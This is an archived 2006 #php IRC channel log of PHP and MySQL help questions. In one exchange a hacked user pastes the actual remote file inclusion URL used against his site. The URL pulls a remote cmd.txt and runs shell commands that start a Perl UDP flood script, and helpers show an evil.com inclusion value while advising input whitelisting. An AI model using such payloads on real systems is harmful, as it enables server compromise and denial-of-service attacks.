IRC Archive / Freenode / #php / 2006 / June / 14 / 1
[slack]
hi, can you tell me why this script doesn't work? http://www.nopaste.info/index.php?id=14d6079b3e .. i want if i click on ID1 switch to id ==1
caffinated
!tell [slack] about register_globals
AqD
anyone know something like hibernate (or better) for php?
(not like AR..)
[slack]
caffinated: sh*t... thx.. ;)
jhgjkguiyt6
anyone know about securing inputs in php script??? i got hacked by some kiddy script who was including stuff from another server??
richardlynch
jhgjkguiyt6: http://phpsec.org
jhgjkguiyt6
richardlynch thx
caffinated
jhgjkguiyt6: that's less about your inputs, and more about how you're using the data submitted by the inputs.
my guess is that you're doing something like: include($_GET['page']);
jhgjkguiyt6
caffinated no! i have nothing like this!!
caffinated
if he is causing your server to execute remote code, then you have something that is doing it.
richardlynch
If you got hacked as you describe, you have to have SOMETHING like that, somewhere, somehow...
||cw
!tell jhgjkguiyt6 about xss
jhgjkguiyt6
they used this link to get in
http://broadband.spectravoice.com/web/index.php?op=http://otravesso.100free.com/cmd.txt?&cmd=cd%20/tmp;mkdir%20.tt;cd%20.tt;perl%20udp.txt%20200.168.245.68%2027015%2027015
richardlynch
He only typed the one-liner obvious way of describing what you said happened, not the convoluted version.
||cw
jhgjkguiyt6: yeah, that sounds like you have include($op); ...guessing reg globals on too :)
caffinated
ROFL
that looks like a shell_exec actually
||cw
heh, Owned Group OwnzZ YouR SySteM
caffinated
haha, nice
yeah, you're right. include
jhgjkguiyt6
this script suck lol
caffinated
no, your code is suck.
jhgjkguiyt6
lol I am not the one who made it :P
||cw
jhgjkguiyt6: just make sure that op= something that you want it to equal, like a number between 1 and 5 or a match from a set list of page names
just don't ever trust user input. assume they will do something wrong
caffinated
since he could not see what was happening, i doubt he is qualified to fix it :P
||cw
edjumacation
jhgjkguiyt6
i see it now <td valign="top"><? include ($op.".php");?></td>
roler
how do I insert an entry into an existing array at a specific location?
caffinated
wow. quality.
richardlynch
So he's getting an education in the Real World that will eventually make him qualified. Isn't that why we bother?
||cw
hm, that .".php" should have failed it
at least for this one it would fail
caffinated
no, because it's easy to eliminate that
$op = "http://evil.com/foo.txt&hi="
||cw
ah, the ? in that op
missed that
Carrera
hi
does anyone know of a good php based PhoneBook
roler
is the only way to insert an entry into an array to go through it and add it to a temporary array and copy it back? or is there a php function for this
||cw
i'm sure freshmeat.net has lots of reviews on them
Carrera
ah
i found Address Book
||cw
roler: depends on where you want to insert it
Carrera
but didn't know about freshmeat.net
richardlynch
roler: Hunh? $array[] = 'value'; or $array[4] = 'fifth'; will do...
Carrera
thanks ||cw
richardlynch
roler: Or maybe you need http://php.net/array_splice
roler
richardlynch; well If I have a [4] already, I want [4] to go to 5
Kartagis
good night :)
richardlynch
roler: http://php.net/array_splice is DEFINITELY what you want.
ThePrhk
is there a way to load a module dynamically and override a module that has been compiled in .. ?
||cw
ThePrhk: no
maybe with runkit
but therein lies madness
ThePrhk
so if gd is compiled in i would need to recompile php to update it .. ?
richardlynch
ThePrhk: Technically, you could just re-compile the GD extension to PHP and install just the .so (or .dll) file, IF you match up all the versions of everything (Apache/PHP) in the header files and all that... Compiling your second time is about 10 X faster than your first, if you are a newbie. :-)
roler
thanks guys!
richardlynch
Buchannon: You could iterate through all the rows and build up a column... Or do you just mean the field names? http://php.net/mysql_field_name
PTWalrus
well, I want to check to see if a date has an entry in the database, and if not, create the entry with no information in it
CppIsWeird
is there any way in the script to change what SMTP server the mail function uses?
Buchannon
richardlynch: going through each row one by one would be quite taxing on mysql wouldn't it? Nah, not the field names but the values in a column
richardlynch
PTWalrus: Create a UNIQUE INDEX on the date field. Do an INSERT. It will fail if it's not unique. Problem solved.
PTWalrus
ahhh and that won't make any messy error messages?
richardlynch
Buchannon: How many rows are there?...
PTWalrus
I did make it unique
Buchannon
richardlynch: well only 2 right now, but I'm expecting it to get bigger
richardlynch
PTWalrus: You control the error messages... if (mysql_errno() == 1062){ //duplicate insert, ignore it. }
Buchannon: Define "bigger"
Buchannon
richardlynch: hard to say right now, I think I found what I was looking for though with mysql_fetch_array()
caffinated
better than letting it error is to use an ON DUPLICATE KEY syntax to take a different action.
that way, you can update any existing parts if it already exists.
sandstrom
On error reporting in php, is it possible to output errors to some log, without showing them to the user?
caffinated
http://php.net/set_error_handler
see also: http://php.net/error_log
richardlynch
sandstrom: That's kinda exactly what it says in php.ini... If you can't change php.ini, nor .htaccess, use set_error_handler as noted already.
caffinated
the second link is probably closer to what you want
orfeu
hi all
phoenixz
Hey there, anybody experience with mysql_connect NOT giving errors upon connect failures?
I have this REALLY weird thing.. I can login to mysql as any random user and mysql_connect just returns a resource
richardlynch
phoenixz: Nope. Are you using http://php.net/mysql_error to check them?
phoenixz
yeah
mysql_error and mysql_errno don't return anything either
richardlynch
phoenixz: And can you then execute queries with that resource?
Maybe your MySQL server is configured to let ANYBODY log in...
phoenixz
well, nope.. that not, the queries fail
richardlynch
So the mysql_select_db fails too, right?
cdecker
Hey all...
Wolfpaws
phoenixz: Do you maybe have an extra @ in there? Or error_reporting to 0?
phoenixz
not sure about the select_db...
I do have the @ in front of mysql_connect, so it won't show php errors, but it still should return fail on failure or not? plus, if i remove the @, it still goes on like nothing happened
cdecker
Sorry to bug you all...a buddy of mine just recently turned me on to this whole IRC thing. I had no idea there was such a huge resource out there for all things php related
I'm located in the DC area and am actively working to expand the local PHP community
richardlynch
cdecker: Just to warn you: All things php related is a bit more scope than we accept :-) Read the link at the tip-top
cdecker
any other DC'ers here?
Wolfpaws
cdecker: /msg php-bot guidelines
cdecker
ah...I appreciate the heads up.
phoenixz
checked, mysql_query("USE DATABASE blah") fails too
Wolfpaws
use mysql_select_db
phoenixz
so basically all fail, except mysql_connect()
ok, but that probably would give the same result or not?
richardlynch
phoenixz: can you show us the basic connect script, and output of var_dump($link) or whatever?
Wolfpaws
php.net/mysql and read it all
phoenixz
I mean.. If mysql_select_db would not fail if I logged in with wrong credentials, that would *really* freak me out.. :)
lig
(Action) waves Hi to everyone and scratches Wolfpaws behind the ears
Wolfpaws
(Action) grunts happily
heya, lig
lig
hey Wolfpaws
Wolfpaws
lig: Have you figured out, who I am? :)
phoenixz
Wolfpaws: I'm very familiar with the mysql interface, it's just that I have not encountered this one yet.. let me paste some info on the subject, one sec
lig
Wolfpaws, haven't a damn clue - but that is a normal state for me :)
Wolfpaws, gonna tell me?
Wolfpaws
ok
lig
LOL
(Action) rubs Wolfpaws belly
Wolfpaws
arf :3
sandstrom
Just realized my app doesn't take summer time (time saving, when you put clock 1 hour ahead at summer) into account.. how could I easily solve this? (right now I am only counting 1 hour ahead of GMT (we are at +1)
richardlynch
Should have known just from the number of kicks :-)
phoenixz
Wolfpaws
(Action) slaps richardlynch
richardlynch
Sorry. :-)
cdecker
So, like I mentioned I'm a member of the DC PHP community and am looking to help it expand. We've managed to start on our efforts by organizing a conference. I've submitted an article to Digg.com about it. You can view it here...http://digg.com/technology/PHP_Open_Source_Attempts_To_Reach_Federal_Government. I'd love for anyone interested in open source in the government to give it a look and digg it if they feel it's worthwhile.
richardlynch
cdecker: I dunno how you managed it, but that link isn't a link in my X-Chat client... I say this only to inform you for the future that you need to do something different... Whitespace in front of http, perhaps...
cdecker
richardlynch: I see...appreciate the heads up. I'm still learning my way around this whole IRC thing.
richardlynch
phoenixz: I think you may want to file a bug report... It really SHOULD return false if the username is not valid, no?
phoenixz
it should yeah..
I'll do some more testing before submitting a bug report.. if this one is true, it's kind of a big one.. better be sure about it
warreng
sup y'all
cdecker
phoenixz: what's the problem that you're having?
larsemil
if i add something to a table, how do i, in the easiest way get to know the id of the data just added?
warreng
mysql_insert_id()
richardlynch
larsemil
perfect!
thought something like that existed
leku
is there a regular expression library for PHP?
i wanna do like
warreng
preg_match/etc
leku
if $string =~ /^%/ { change it }
richardlynch
!tell leku about enter
leku: http://php.net/pcre
leku
please don't try and tell me how I should conduct myself on IRC
that is a waste of your time and mine.
warreng
!tell leku about enter
leku
as****es
warreng
heh
richardlynch
Saved somebody some time...
cdecker
interesting
cheater
hey